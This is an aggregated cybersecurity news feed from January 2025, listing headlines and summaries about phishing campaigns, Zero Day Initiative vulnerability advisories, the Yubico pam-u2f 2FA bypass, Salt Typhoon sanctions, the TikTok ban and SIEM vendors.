Phishing Attacks Are the Most Common Smartphone Security Issue for ConsumersNew hands-on testing results show that most devices are unable to catch phishing emails, texts, or calls, leaving users at risk.
by Dark Reading
2025-01-20 13:03:56
Threat Actors Abuse Google Translate to Craft Phishing LinksThreat actors are abusing Google Translate’s redirect feature to craft phishing links that appear to belong to, according to researchers at Abnormal Security.
by KnowBe4
2025-01-20 13:03:20
Phishing Campaign Attempts to Bypass iOS ProtectionsAn SMS phishing (smishing) campaign is attempting to trick Apple device users into disabling measures designed to protect them against malicious links, BleepingComputer reports.
by KnowBe4
2025-01-20 13:03:07
African firms worry over state cyber safeguards – The CitizenA recent Global Cybersecurity Outlook report by the World Economic Forum reveals that over 40% of African companies lack confidence in their governments'' ability to handle major cybersecurity incidents, a higher percentage than in other global regions. The post African firms worry over state cyber safeguards – The Citizen appeared first on ZENDATA Cybersecurity.
by Zendata
2025-01-20 13:02:32
From Pig Butchering to People TalkingInterpol has recently recommended discontinuing the use of the term ""Pig Butchering"" in cybercrime discussions, expressing concern that such terminology may discourage victims from reporting incidents due to feelings of shame or embarrassment.
by KnowBe4
2025-01-20 12:45:49
Fintech Bill Pay Platform “Willow Pays” Exposes Over 240,000 RecordsSecurity researcher discovers a non-password-protected database containing over 240,000 records belonging to US-based FinTech bill payment platform Willow…
by Hackread
2025-01-20 11:24:24
Yubico Warns of 2FA Security Flaw in pam-u2f for Linux and macOS UsersYubico has released a security advisory, YSA-2025-01, which highlighted a vulnerability within the software module that supports two-factor authentication (2FA) for Linux and macOS platforms. This issue, tracked as CVE-2025-23013, allows for a partial 2FA bypass protections when using YubiKeys or other FIDO-compatible authenticators. The vulnerability poses a high-risk security threat and could potentially compromise authentication processes for users relying on Yubico’s open-source pam-u2f software. Yubico''s pam-u2f software package, a Pluggable Authentication Module (PAM) used to integrate YubiKey and other FIDO-compliant devices with Linux and macOS systems, contains a vulnerability that can lead to a 2FA bypass in some configurations. This flaw primarily affects systems running versions of pam-u2f prior to 1.3.1, where the authentication process does not correctly handle certain errors. In particular, when the system experiences issues such as memory allocation errors or the absence of necessary files, the pam-u2f module may fail to trigger proper authentication checks. The 2FA Bypass Vulnerability The 2FA bypass vulnerability arises in the pam_sm_authenticate() function, which is responsible for managing the authentication flow. When certain conditions occur—such as failure to allocate memory or privilege escalation issues—the function returns a response of PAM_IGNORE. This prevents the system from completing the authentication process correctly, bypassing 2FA in scenarios where it should be validated. Additionally, if the nouserok option is enabled in the configuration, pam-u2f may return PAM_SUCCESS even when the authfile is missing or corrupted. This presents a critical risk, particularly in configurations where 2FA is set up as the primary or secondary authentication factor. What Does This Mean for Users? The vulnerability primarily affects users who have installed pam-u2f on Linux or macOS systems via methods like apt or manual installation. Specifically, users with versions of pam-u2f prior to 1.3.1 are vulnerable to this issue, which may lead to unauthorized access if the system’s 2FA protections are bypassed. However, no hardware used for 2FA, including any YubiKey devices, is affected by this vulnerability. The issue lies entirely within the software configuration, not the hardware security keys. Yubico has recommended that all affected customers upgrade to the latest version of pam-u2f immediately to mitigate the vulnerability. Users can download the latest release directly from Yubico’s GitHub repository or update via Yubico’s Personal Package Archive (PPA). How Are Different Configurations Impacted? The severity of the vulnerability varies depending on the system configuration. For instance: Single Factor Authentication with User-Managed Authfile: In this scenario, where pam-u2f is used as a single factor and the authfile is located in the user''s home directory, an attacker could remove or corrupt the authfile. This would cause pam-u2f to return PAM_SUCCESS, allowing unauthorized access and potentially escalating privileges if the user has sudo access. This scenario has been assigned a CVSS score of 7.3, indicating a high severity. Two-Factor Authentication with Centrally Managed Authfile: If pam-u2f is used alongside a user’s password for two-factor authentication, the vulnerability may be triggered by a memory allocation error or a lack of necessary files. In this case, the second authentication factor may fail to verify, leaving the system open to attacks. This scenario carries a CVSS score of 7.1. Use of pam-u2f as a Single Authentication Factor with Other PAM Modules: When pam-u2f is used in conjunction with other PAM modules that do not perform authentication, forcing a PAM_IGNORE response would prevent any authentication from occurring. If the user has administrative privileges, this could lead to local privilege escalation. This scenario also carries a CVSS score of 7.3. Conclusion Yubico urges affected customers to immediately upgrade to the latest version of pam-u2f to protect against the 2FA bypass vulnerability, with alternative mitigation measures available for those unable to update right away. This advisory highlights the crucial role of two-factor authentication (2FA) in securing systems, while also showing that vulnerabilities within 2FA solutions can still pose risks.
by The Cyber Express
2025-01-20 11:15:00
Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTPCybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repository that come with capabilities to steal data and even delete sensitive data from infected systems. The list of identified packages is below - @async-mutex/mutex, a typosquat of async-mute (npm) dexscreener, which masquerades as a library for accessing liquidity pool
by The Hacker News
2025-01-20 11:00:00
The Human Touch in Tech: Why Local IT Support Remains EssentialAs automation and AI reshape IT support, local providers continue to shine by offering personalized service, rapid on-site assistance, and creative problem-solving for complex issues.
by ITPro Today
2025-01-20 10:00:00
Hybrid Cloud, AI Emerge as Critical Priorities for IT Leaders in 2025, Rackspace Study FindsOrganizations are increasingly reconsidering where they put their money and workloads in the cloud as AI becomes a new driver.
by ITPro Today
2025-01-20 09:37:50
Budget 2025 on the Horizon: Will India Take the Leap in Enhancing Cybersecurity and Data Privacy?With the Budget 2025 soon to be announced, India stands at a pivotal moment in its digital transformation journey, increasingly relying on digital platforms and technologies for business, governance, and daily life. As the nation''s digital ecosystem experiences exponential growth, driven by a surge in mobile applications, the need to enhance its cybersecurity infrastructure has never been more urgent. Sharing his perspective on this vital issue, Manish Mimani, Founder and CEO of Protectt.ai, emphasizes that the Union Budget 2025 offers a pivotal opportunity to strengthen India’s digital & cybersecurity framework. Mimani highlights the need for focused financial reforms, strategic investments, and innovative policies to bolster India’s defenses against growing cyber risks, while fostering a culture of resilience and innovation in the cybersecurity ecosystem. The following key recommendations by Mimani outline how Budget 2025 can play a transformative role in securing India’s digital future: Budget 2025: What to Except for Cybersecurity Establishing a Cybersecurity Research & Development (R&D) in Multiple city The government could allocate funds to establish a dedicated R&D institute focused on cybersecurity. This hub would foster innovation and develop advanced security solutions tailored to India’s unique needs. By nurturing homegrown technologies, India can reduce reliance on foreign solutions and position itself as a global leader in cybersecurity innovation. Financial Incentives for Cybersecurity Startups Targeted financial incentives, such as tax holidays, grants, and subsidized loans, could stimulate the growth of startups specializing in cybersecurity. Encouraging innovation in this sector would not only strengthen India’s defenses but also allow the nation to capture a larger share of the growing global cybersecurity market. Upskilling and Talent Development Bridging the cybersecurity skills gap is essential for safeguarding India’s digital future. The budget could fund comprehensive training and upskilling programs, including partnerships with educational institutions to develop specialized curricula. Subsidized training for IT professionals and initiatives to attract talent to cybersecurity careers would help ensure a robust pipeline of skilled professionals. Public-Private Partnerships for Cybersecurity Infrastructure Allocating budgetary support for public-private partnerships (PPPs) could accelerate the development of shared cybersecurity resources. Collaborative initiatives between the government and private sector would create platforms for threat intelligence sharing, infrastructure development, and advanced research, bolstering India’s ability to counter emerging cyber threats. Reduction in GST on 100% Made in India Cybersecurity Products Reducing the Goods and Services Tax (GST) on cybersecurity software and tools could make essential safeguards more affordable for businesses, especially small and medium enterprises (SMEs). Currently taxed at 18%, lowering this rate would enable wider adoption of advanced security solutions, enhancing the resilience of India’s digital infrastructure. Lower Import Duties on Critical Hardware High import duties on servers, GPUs, and other essential components inflate the cost of building robust cybersecurity systems. By reducing these duties, the government could make cutting-edge technology more accessible to businesses, enabling real-time threat detection and efficient anomaly analysis across sectors. Tax Benefits for Cybersecurity Investments Introducing tax incentives for businesses that implement strong cybersecurity measures could encourage proactive adoption of best practices. Deductions for investments in cybersecurity audits, penetration testing, and advanced security systems would foster a more secure digital ecosystem. Conclusion The Union Budget 2025 represents a significant opportunity to bolster India’s cybersecurity capabilities. By adopting strategic measures such as tax incentives, reduced GST rates, and investments in R&D and talent development, the government can create a more resilient and secure digital environment. As businesses and citizens increasingly depend on digital platforms, mobile app security emerges as a critical focus area within the broader cybersecurity landscape. By directing resources and attention to this domain, India can ensure the safety of its digital economy, foster innovation, and maintain its appeal as a global hub for technology and investment.
by The Cyber Express
2025-01-20 09:33:19
Agent vs. Agentless Cloud Security: Why Deployment Methods MatterCloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
by Darktrace
2025-01-20 08:02:57
A week in security (January 13 – January 19)Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!
by Malwarebytes Labs
2025-01-20 00:54:56
Industry Moves for the week of January 20, 2025 - SecurityWeekExplore industry moves and significant changes in the industry for the week of January 20, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-01-20 00:00:00
ZDI-25-055: Sante PACS Server URL path Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2025-0574.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-054: Sante PACS Server Web Portal DCM File Parsing Directory Traversal Arbitrary File Write VulnerabilityThis vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-0572.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-053: Sante PACS Server DCM File Parsing Directory Traversal Arbitrary File Write VulnerabilityThis vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-0573.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-052: Sante PACS Server DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0569.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-051: Sante PACS Server Web Portal DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0571.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-050: Sante PACS Server Web Portal DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0570.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-049: Sante PACS Server DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0568.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-048: Apple WebKit WebCore ContainerNode Use-After-Free Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple WebKit. User interaction is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-27856.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-047: WinZip 7Z File Parsing Out-Of-Bounds Write Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8811.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-046: Adobe Photoshop node_modules Uncontrolled Search Path Element Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Adobe Photoshop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-21127.
by Zero Day Initiative Advisories
2025-01-19 16:19:26
TikTok ban takes hold: data reveals sharp traffic decline and rapid shift to alternativesOn January 19, 2025, ByteDance shut down access to TikTok and other owned/operated apps for US users, causing an 85% traffic plunge and a rapid shift to alternatives like RedNote.
by Cloudflare
2025-01-19 16:00:00
Employees of failed startups are at special risk of stolen personal data through old Google loginsAs if losing your job when the startup you work for collapses isn’t bad enough, now a security researcher has found that employees at failed startups are at particular risk of having their data stolen. This ranges from their private Slack messages to Social Security numbers and, potentially, bank accounts. The researcher who discovered the […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-19 10:54:00
TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025Popular video-sharing social network TikTok has officially gone dark in the United States, as a federal ban on the app comes into effect on January 19, 2025. ""We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable,"" the company said in a pop-up message. ""We''re working to restore our service in the U.S. as soon as possible
by The Hacker News
2025-01-19 05:39:26
How to Get Around the US TikTok BanTikTok is now unavailable in the United States—and getting around the ban isn’t as simple as using a VPN. Here’s what you need to know.
by WIRED Security News
2025-01-19 00:00:00
ZDI-25-045: 7-Zip Mark-of-the-Web Bypass VulnerabilityThis vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2025-0411.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-044: Ivanti Avalanche SecureFilter Authentication Bypass VulnerabilityThis vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13179.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-043: Ivanti Avalanche Faces ResourceManager Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13180.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-042: Ivanti Avalanche SecureFilter allowPassThrough Authentication Bypass VulnerabilityThis vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13181.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-041: Ivanti Endpoint Manager updateAssetInfo SQL Injection Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13162.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-040: Ivanti Endpoint Manager DecodeBase64Object Deserialization of Untrusted Data Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13163.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-039: Ivanti Endpoint Manager AlertService Uninitialized Memory Information Disclosure VulnerabilityThis vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.2. The following CVEs are assigned: CVE-2024-13164.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-038: Ivanti Endpoint Manager Improper Input Validation AlertService Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13165.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-037: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13166.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-036: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13167.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-035: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13168.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-034: Ivanti Endpoint Manager AlertService Type Confusion Information Disclosure VulnerabilityThis vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-13169.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-033: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13170.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-032: Ivanti Endpoint Manager HIIDriver Improper Verification of Cryptographic Signature Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13172.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-031: Ivanti Endpoint Manager MyResolveEventHandler Untrusted Search Path Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13158.
by Zero Day Initiative Advisories
2025-01-18 15:27:12
DOJ confirms arrested US Army soldier is linked to AT&T and Verizon hacksThe alleged hacker claimed to have access to huge amounts of call records, including VP Kamala Harris and President Trump. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-18 15:12:00
You need a router-based VPN in 2025. Here's why and how to set one upUsing a VPN alone is no longer enough. Here''s how to pair the WireGuard protocol with your favorite VPN to protect your entire network.
by ZDNET Security
2025-01-18 12:00:00
How victims of PowerSchool’s data breach helped each other investigate ‘massive’ hackSchool workers say they resorted to crowdsourcing help among each other following PowerSchool''s breach, fueled by solidarity and the slow response from PowerSchool. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-18 11:36:00
U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Salt TyphoonThe U.S. Treasury Department''s Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. ""People''s Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent
by The Hacker News
2025-01-18 11:30:00
US Names One of the Hackers Allegedly Behind Massive Salt Typhoon BreachesPlus: New details emerge about China’s cyber espionage against the US, the FBI remotely uninstalls malware on 4,200 US devices, and victims of the PowerSchool edtech breach reveal what hackers stole.
by WIRED Security News
2025-01-18 11:00:00
Navigating IT Liability in 2025: Strategies for Mitigating RisksAs cyberthreats evolve and data privacy laws tighten, companies must address IT liability. Here are key steps every company should take.
by ITPro Today
2025-01-18 10:00:00
CES 2025: 8 Eye-Grabbing Tech InnovationsCES 2025 showcased a blend of cutting-edge AI innovations and standout hardware, proving the future of tech is as imaginative as ever.
by ITPro Today
2025-01-17 22:22:05
How VCs Are Looking at AI Startups TodayVC firms are focusing on both the technology and the teams behind AI startups, recognizing that successful investments will require adaptability, strategic direction, and innovation in a rapidly evolving market.
by ITPro Today
2025-01-17 22:03:46
Has the TikTok Ban Already Backfired on US Cybersecurity?The Supreme Court has affirmed TikTok''s ban in the US, which has its users in revolt and is creating a whole new set of national cybersecurity concerns.
by Dark Reading
2025-01-17 21:53:23
Effective Security Awareness Training Really Does Reduce Data BreachesSocial engineering and phishing are involved in 70% - 90% of data breaches. No other root cause of malicious hacking (e.g., unpatched software and firmware, eavesdropping, cryptography attacks, physical theft, etc.) comes close.
by KnowBe4
2025-01-17 20:25:59
National Security Memorandum (NSM) on Artificial Intelligence: Democracy + Tech Initiative MarkupOn October 24, 2024, the Biden Administration released its National Security Memorandum (NSM) on Artificial Intelligence. Read along with AC Tech Programs staff, fellows, and industry experts for commentary and analysis. The post National Security Memorandum (NSM) on Artificial Intelligence: Democracy + Tech Initiative Markup appeared first on DFRLab.
by DFRLab
2025-01-17 20:23:43
Employees Enter Sensitive Data Into GenAI Prompts Far Too OftenThe propensity for users to enter customer data, source code, employee benefits information, financial data, and more into ChatGPT, Copilot, and others is racking up real risk for enterprises.
by Dark Reading
2025-01-17 19:44:31
15K Fortinet Device Configs Leaked to the Dark WebThe stolen firewall data is thorough but more than 2 years old now, meaning that most organizations following even basic security practices face minimal risk, hopefully.
by Dark Reading
2025-01-17 19:43:18
US Sanctions Chinese Hacker & Firm for Treasury, Critical Infrastructure BreachesThe cyber actor played a role in the Treasury breach as well as attacks on critical infrastructure, linked to China-backed advanced persistent threat (APT) group Salt Typhoon.
by Dark Reading
2025-01-17 19:38:00
Critical Flaws in WGS-804HPT Switches Enable RCE and Network ExploitationCybersecurity researchers have disclosed three security flaws in Planet Technology''s WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. ""These switches are widely used in building and home automation systems for a variety of networking applications,"" Claroty''s Tomer Goldschmidt said in a Thursday report. ""An attacker
by The Hacker News
2025-01-17 18:56:12
Detecting and mitigating CVE-2024-12084: rsync remote code executionOn Tuesday, January 14, 2025, a set of vulnerabilities were announced that affect the “rsync” utility. rsync allows files and... The post Detecting and mitigating CVE-2024-12084: rsync remote code execution appeared first on Sysdig.
by Sysdig
2025-01-17 18:48:19
The FCC’s Jessica Rosenworcel Isn’t Leaving Without a FightAs the US faces “the worst telecommunications hack in our nation’s history,” by China’s Salt Typhoon hackers, the outgoing FCC chair is determined to bolster network security if it’s the last thing she does.
by WIRED Security News
2025-01-17 18:36:00
Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform ProliferationCybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. ""Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps,"" Imperva researcher Daniel Johnston said in an analysis. ""These attacks
by The Hacker News
2025-01-17 18:04:45
SIEM Vendors: Leading the Way in Cybersecurity Monitoring and Threat DetectionThe ability to detect, analyze, and respond to threats in real-time is critical. Security Information and Event Management solutions play a pivotal role in helping organizations achieve this by providing a comprehensive view of their IT environment, detecting anomalies, and offering actionable insights for incident response. The SIEM market has grown substantially, with numerous vendors offering a variety of solutions tailored to meet different business needs. In this article, we will explore the leading SIEM vendors and what they offer. What is SIEM Security Information and Event Management (SIEM) refers to the technology that combines security information management (SIM) and security event management (SEM). SIEM solutions collect and aggregate log data from a variety of sources (network devices, applications, security tools, etc.), providing real-time monitoring, event correlation, and security alerting. These solutions enable businesses to detect potential security breaches, respond promptly, and maintain compliance with industry regulations. Key functionalities of SIEM include: Log Management: Collecting and storing logs from diverse sources. Event Correlation: Analyzing logs to identify security threats. Alerting and Reporting: Triggering alerts based on suspicious activity and generating compliance reports. Incident Response: Providing information to facilitate the detection and resolution of security incidents. Leading SIEM Vendors in the Market Splunk Overview: Splunk is one of the most popular and well-known SIEM vendors, offering an advanced platform for searching, monitoring, and analyzing machine data. It provides a comprehensive security solution, allowing businesses to gain deep visibility into their IT infrastructure and respond to security incidents effectively. Key Features: Powerful search and analytics engine. Real-time security monitoring and alerting. Advanced correlation capabilities to detect complex threats. Scalability to handle large amounts of data. Best for: Enterprises requiring flexible, customizable, and highly scalable solutions. IBM QRadar Overview: IBM QRadar is a robust SIEM platform that offers comprehensive security monitoring, event correlation, and real-time data analysis. It integrates seamlessly with other IBM security products and provides a unified view of an organization’s security posture. Key Features: Advanced threat detection and analytics. Pre-configured security use cases for faster deployment. High-quality reporting and compliance support. Automated incident response workflows. Best for: Large enterprises and organizations with complex security environments. LogRhythm Overview: LogRhythm is a well-regarded SIEM vendor that focuses on providing an integrated security platform. It offers a comprehensive solution for threat detection, monitoring, and compliance. LogRhythm is known for its ease of use and ability to integrate with existing IT infrastructure. Key Features: Centralized log management and real-time event correlation. Advanced anomaly detection and behavioral analytics. Automated workflows for incident response. Out-of-the-box integrations with many security tools and systems. Best for: Mid-sized businesses looking for an intuitive, easy-to-deploy solution. SolarWinds Overview: SolarWinds is a well-known IT management company that also offers a powerful SIEM solution. SolarWinds’ SIEM solution is particularly well-suited for businesses looking for a cost-effective, scalable, and user-friendly platform. Key Features: Real-time monitoring and security event correlation. Incident response and alerting. Integrated network performance monitoring. Customizable dashboards and reports. Best for: Small to mid-sized businesses and organizations with a focus on network performance. AlienVault (AT&T Cybersecurity) Overview: AlienVault, now part of AT&T Cybersecurity, is an affordable, cloud-based SIEM solution that offers essential features for threat detection and compliance. It is popular among businesses that require a budget-friendly option with high-quality threat intelligence. Key Features: Built-in threat intelligence feeds. Automated log collection and analysis. Compliance reporting (PCI DSS, HIPAA, GDPR). Simple, easy-to-deploy solution with cloud-based options. Best for: Small businesses and organizations with limited resources seeking a user-friendly solution. Sumo Logic Overview: Sumo Logic is a cloud-native SIEM solution known for its ease of deployment and scalability. The platform is designed to handle large-scale environments and provides real-time analytics, monitoring, and insights. Key Features: Cloud-based architecture for seamless scalability. Real-time monitoring and log analytics. Machine learning-powered anomaly detection. Integrated compliance and security monitoring. Best for: Organizations adopting a cloud-first strategy and businesses with large, distributed environments. McAfee Enterprise Security Manager (ESM) Overview: McAfee’s Enterprise Security Manager (ESM) offers real-time threat intelligence, log management, and event correlation. It is particularly well-suited for organizations looking to integrate SIEM with McAfee’s security products for enhanced threat protection. Key Features: Automated incident detection and response. Centralized log management for large enterprises. Integration with McAfee’s security ecosystem. Compliance reporting and auditing. Best for: Enterprises with existing McAfee security solutions and those seeking deep integration with endpoint protection. Fortinet FortiSIEM Overview: FortiSIEM is a unified SIEM solution that offers comprehensive security monitoring, analytics, and response capabilities. The platform is integrated with Fortinet’s suite of cybersecurity solutions, providing enhanced visibility into network security. Key Features: Correlation of security events from multiple sources. Threat intelligence integration for better detection. Real-time monitoring and compliance reporting. Scalability for large and complex environments. Best for: Organizations already using Fortinet products or those needing a highly integrated security solution. Choosing the Right SIEM Vendor Selecting the right SIEM solution depends on various factors, including your organization’s size, complexity, security needs, and budget. Here are a few considerations to keep in mind when choosing a SIEM vendor: Scalability: Ensure the SIEM solution can scale as your organization grows. Ease of Use: Choose a platform that your team can easily deploy and manage. Integration: Ensure the SIEM solution can integrate with your existing security infrastructure and tools. Customization: Look for a solution that can be tailored to meet your organization’s specific security needs. Threat Intelligence: Ensure the solution provides strong threat intelligence feeds and advanced analytics for accurate threat detection. Conclusion The market for SIEM solutions is diverse, with many vendors offering specialized capabilities designed to meet the varying needs of businesses across different industries. Whether you’re a large enterprise or a small business, choosing the right SIEM vendor can significantly enhance your security posture by enabling better visibility, quicker threat detection, and more effective incident response. By understanding the strengths and capabilities of each SIEM vendor, organizations can make informed decisions and select the platform that best fits their needs, ultimately improving their overall cybersecurity defense.rtant: Your blog article will go under a review by one of our admin or moderator just to prevent spams and will approved or our moderators will get in touch with you to solve the issue or suggest improvements - essentially a editorial support.
by HACKLIDO
2025-01-17 17:10:38
Treasury sanctions Salt Typhoon hacking group behind breaches of major US telecom firmsThe US government has also sanctioned the hacker responsible for December''s US Treasury hack © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-17 17:05:43
Malware stole internal PowerSchool passwords from engineer’s hacked computerThe theft of a PowerSchool engineer''s passwords prior to the breach raises further doubts about the company''s security practices. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-17 16:34:29
Biden's Cybersecurity EO Leaves Trump a Comprehensive Blueprint for DefenseNew order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?
by ITPro Today
2025-01-17 16:25:04
WhatsApp spear phishing campaign uses QR codes to add deviceA cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...
by Malwarebytes Labs
2025-01-17 15:51:00
